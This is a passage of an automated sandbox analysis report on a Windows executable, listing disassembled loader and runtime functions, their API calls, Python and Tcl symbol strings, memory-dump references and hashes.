                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8FF09052B2D787E0FE987B62A8513B563809F88F80F4C55B0CD0EC63F1EE1CE480A210
                                                                                                                                                                                                                                          Function 00007FF67AEED66C Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(?,?,?,00007FF67AEE0D00,?,?,?,00007FF67AEE236A,?,?,?,?,?,00007FF67AEE3B59), ref: 00007FF67AEED6AA
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AllocHeap
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4292702814-0
                                                                                                                                                                                                                                          • Opcode ID: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
                                                                                                                                                                                                                                          • Instruction ID: 246bcc63316234fdbbf05648262b30252832f46eca54ec5bf25f60ccc97889d3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5ab6faa5eb5c52a79f6ef15f458d67d4847db3a002ac7bba2a3205d093894568
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AFF05812F2E34384FEA47771588127813908F94BA0F0C03B0DD2ECA3F2EE6CE480A610

                                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                                          Function 00007FF67AED5820 Relevance: 229.6, APIs: 86, Strings: 45, Instructions: 400libraryloaderCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00007FF67AED64BF,?,00007FF67AED336E), ref: 00007FF67AED5830
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00007FF67AED64BF,?,00007FF67AED336E), ref: 00007FF67AED5842
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00007FF67AED64BF,?,00007FF67AED336E), ref: 00007FF67AED5879
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00007FF67AED64BF,?,00007FF67AED336E), ref: 00007FF67AED588B
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00007FF67AED64BF,?,00007FF67AED336E), ref: 00007FF67AED58A4
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00007FF67AED64BF,?,00007FF67AED336E), ref: 00007FF67AED58B6
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00007FF67AED64BF,?,00007FF67AED336E), ref: 00007FF67AED58CF
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00007FF67AED64BF,?,00007FF67AED336E), ref: 00007FF67AED58E1
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00007FF67AED64BF,?,00007FF67AED336E), ref: 00007FF67AED58FD
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00007FF67AED64BF,?,00007FF67AED336E), ref: 00007FF67AED590F
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00007FF67AED64BF,?,00007FF67AED336E), ref: 00007FF67AED592B
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00007FF67AED64BF,?,00007FF67AED336E), ref: 00007FF67AED593D
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00007FF67AED64BF,?,00007FF67AED336E), ref: 00007FF67AED5959
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00007FF67AED64BF,?,00007FF67AED336E), ref: 00007FF67AED596B
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00007FF67AED64BF,?,00007FF67AED336E), ref: 00007FF67AED5987
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00007FF67AED64BF,?,00007FF67AED336E), ref: 00007FF67AED5999
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00007FF67AED64BF,?,00007FF67AED336E), ref: 00007FF67AED59B5
                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,00007FF67AED64BF,?,00007FF67AED336E), ref: 00007FF67AED59C7
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                          • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                                          • API String ID: 199729137-653951865
                                                                                                                                                                                                                                          • Opcode ID: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
                                                                                                                                                                                                                                          • Instruction ID: e33f6a3009816e3b3d5cd57f177aaf321020c512ca1b45e661f61a2a33ef5d31
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7C22B566A39F47C5FA84BB55B82057423A1EF88744F6454B9C85E822B0FF3CB188FA14
                                                                                                                                                                                                                                          Function 00007FF67AEDD19C Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3140674995-0
                                                                                                                                                                                                                                          • Opcode ID: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
                                                                                                                                                                                                                                          • Instruction ID: cf2770487e1234ec44757334ece3c32facafec0d435b1ac96b1089b2e334007d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e81d7d82d421bb6c6595da19fcb57285cd54aee8b88ef40036ddb2a35706c3b0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 81313373619B8189EBA09F64E8803EE7364FB84744F444439DA4D87BA5EF3CD548DB10
                                                                                                                                                                                                                                          Function 00007FF67AEF5C70 Relevance: 9.3, APIs: 6, Instructions: 334timeCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF67AEF5CB5
                                                                                                                                                                                                                                            • Part of subcall function 00007FF67AEF5608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF67AEF561C
                                                                                                                                                                                                                                            • Part of subcall function 00007FF67AEEA9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF67AEF2D92,?,?,?,00007FF67AEF2DCF,?,?,00000000,00007FF67AEF3295,?,?,?,00007FF67AEF31C7), ref: 00007FF67AEEA9CE
                                                                                                                                                                                                                                            • Part of subcall function 00007FF67AEEA9B8: GetLastError.KERNEL32(?,?,?,00007FF67AEF2D92,?,?,?,00007FF67AEF2DCF,?,?,00000000,00007FF67AEF3295,?,?,?,00007FF67AEF31C7), ref: 00007FF67AEEA9D8
                                                                                                                                                                                                                                            • Part of subcall function 00007FF67AEEA970: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF67AEEA94F,?,?,?,?,?,00007FF67AEEA83A), ref: 00007FF67AEEA979
                                                                                                                                                                                                                                            • Part of subcall function 00007FF67AEEA970: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF67AEEA94F,?,?,?,?,?,00007FF67AEEA83A), ref: 00007FF67AEEA99E
                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF67AEF5CA4
                                                                                                                                                                                                                                            • Part of subcall function 00007FF67AEF5668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF67AEF567C
                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF67AEF5F1A
                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF67AEF5F2B
                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF67AEF5F3C
                                                                                                                                                                                                                                          • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF67AEF617C), ref: 00007FF67AEF5F63
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4070488512-0
                                                                                                                                                                                                                                          • Opcode ID: 76424cc0ec02945f4fd2ccc640ea60475aa997d4131cc6c9dd67359800dfdabb
                                                                                                                                                                                                                                          • Instruction ID: 2ea0de5c1396435eefc315366a3c5b596948944cbb0b1f8305bf955c7f59c302
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 76424cc0ec02945f4fd2ccc640ea60475aa997d4131cc6c9dd67359800dfdabb
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 45D12363A2828286E7A4FF21E8501B92751FF94784F41817EEE0DC76A6EF3CE541DB50
                                                                                                                                                                                                                                          Function 00007FF67AEEA684 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1239891234-0
                                                                                                                                                                                                                                          • Opcode ID: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
                                                                                                                                                                                                                                          • Instruction ID: 759933061a3edcf233720f7591b4b4f66ffe811888fea1985be1a0af5e8c6ccc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 823e7cd4caae9fc37a1281b2c5c5551f9de180c5e8ac7c275112a8c84bbfd9bf
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 92318837628F8189E760DF25E8402AE73A4FB84754F540179EA9D87B65EF3CD145CB00
                                                                                                                                                                                                                                          Function 00007FF67AEF18E4 Relevance: 7.8, APIs: 5, Instructions: 282COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FileFindFirst_invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2227656907-0
                                                                                                                                                                                                                                          • Opcode ID: 5fde642f47360a120b3bbdc49a752417dcdc94f7dd720a243365bab1f94d45be
                                                                                                                                                                                                                                          • Instruction ID: edf9fc3ce711f272e282dd1079321189cd236e8647c2bf17a826b26ca683f037
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5fde642f47360a120b3bbdc49a752417dcdc94f7dd720a243365bab1f94d45be
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ACB1B723B3C69A81EAA1AB21F4101BD6350EB44BE4F44517AEF5D87BE5EE3CE441DB00
                                                                                                                                                                                                                                          Function 00007FF67AEF5EEC Relevance: 6.1, APIs: 4, Instructions: 143timeCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF67AEF5F1A
                                                                                                                                                                                                                                            • Part of subcall function 00007FF67AEF5668: _invalid_parameter_noinfo.LIBCMT ref: 00007FF67AEF567C
                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF67AEF5F2B
                                                                                                                                                                                                                                            • Part of subcall function 00007FF67AEF5608: _invalid_parameter_noinfo.LIBCMT ref: 00007FF67AEF561C
                                                                                                                                                                                                                                          • _get_daylight.LIBCMT ref: 00007FF67AEF5F3C
                                                                                                                                                                                                                                            • Part of subcall function 00007FF67AEF5638: _invalid_parameter_noinfo.LIBCMT ref: 00007FF67AEF564C
                                                                                                                                                                                                                                            • Part of subcall function 00007FF67AEEA9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF67AEF2D92,?,?,?,00007FF67AEF2DCF,?,?,00000000,00007FF67AEF3295,?,?,?,00007FF67AEF31C7), ref: 00007FF67AEEA9CE
                                                                                                                                                                                                                                            • Part of subcall function 00007FF67AEEA9B8: GetLastError.KERNEL32(?,?,?,00007FF67AEF2D92,?,?,?,00007FF67AEF2DCF,?,?,00000000,00007FF67AEF3295,?,?,?,00007FF67AEF31C7), ref: 00007FF67AEEA9D8
                                                                                                                                                                                                                                          • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF67AEF617C), ref: 00007FF67AEF5F63
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3458911817-0
                                                                                                                                                                                                                                          • Opcode ID: 8084827ab6892e9bf44fc7ae7df730cc4e836e683a41a1d7f4ca7a201d78ec16
                                                                                                                                                                                                                                          • Instruction ID: d61ec9e0fa794d2f44115e73846f00e2dfcd64ce800a22537beb987f8174e5fb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8084827ab6892e9bf44fc7ae7df730cc4e836e683a41a1d7f4ca7a201d78ec16
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C251C873A2868286E7A0FF21E8915B96760FB58784F4151BDDA4DC77B6DF3CE4009B40
                                                                                                                                                                                                                                          Function 00007FF67AEF34F0 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: HeapProcess
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 54951025-0
                                                                                                                                                                                                                                          • Opcode ID: 39e33fd4700d97162abc6aa121af668d241eeaeaed41ff08026f27548e358ff0
                                                                                                                                                                                                                                          • Instruction ID: 2803a5e62b705b468aee84ba10852317c11c63147df96a384df514d7d84b495e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 39e33fd4700d97162abc6aa121af668d241eeaeaed41ff08026f27548e358ff0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FDB09221E27A82C6FA883B25AC8222822A4BF98700F9802B8C05C81330DE2C20E56B00
                                                                                                                                                                                                                                          Function 00007FF67AEDD37C Relevance: .0, Instructions: 2COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: e6acc2ec838af36dd9636ef9e1d94249ffac8b7a33868b0b47a68aa66541c0b8
                                                                                                                                                                                                                                          • Instruction ID: 2e9bd32bcebee79c6041211e9b3ea31103731ee4225d4238ef679b378a1be806
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e6acc2ec838af36dd9636ef9e1d94249ffac8b7a33868b0b47a68aa66541c0b8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 06A0022796EC0AD4F684AB04F8D00352335FB90300B5000B5E04DC10B09F3CA400F700
                                                                                                                                                                                                                                          Function 00007FF67AED76B0 Relevance: 177.1, APIs: 66, Strings: 35, Instructions: 314libraryloaderCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.3019440736.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019253519.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019597939.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3019759926.00007FF67AF12000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.3020018200.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                          • String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
                                                                                                                                                                                                                                          • API String ID: 199729137-3427451314
                                                                                                                                                                                                                                          • Opcode ID: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
                                                                                                                                                                                                                                          • Instruction ID: 290cf50cdac859011090c93e8e66773414d5a2c089083a1b491222655bb0ea97
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A602D526E3EB07C5FA84BF54B8605B82361EF48759F5040B9D86E82270EF3CB549FA50
                                                                                                                                                                                                                                          Function 00007FF67AED81C0 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 117COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00007FF67AED9400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF67AED45E4,00000000,00007FF67AED1985), ref: 00007FF67AED9439
                                                                                                                                                                                                                                          • ExpandEnvironmentStringsW.KERNEL32(?,00007FF67AED88A7,?,?,00000000,00007FF67AED3CBB), ref: 00007FF67AED821C
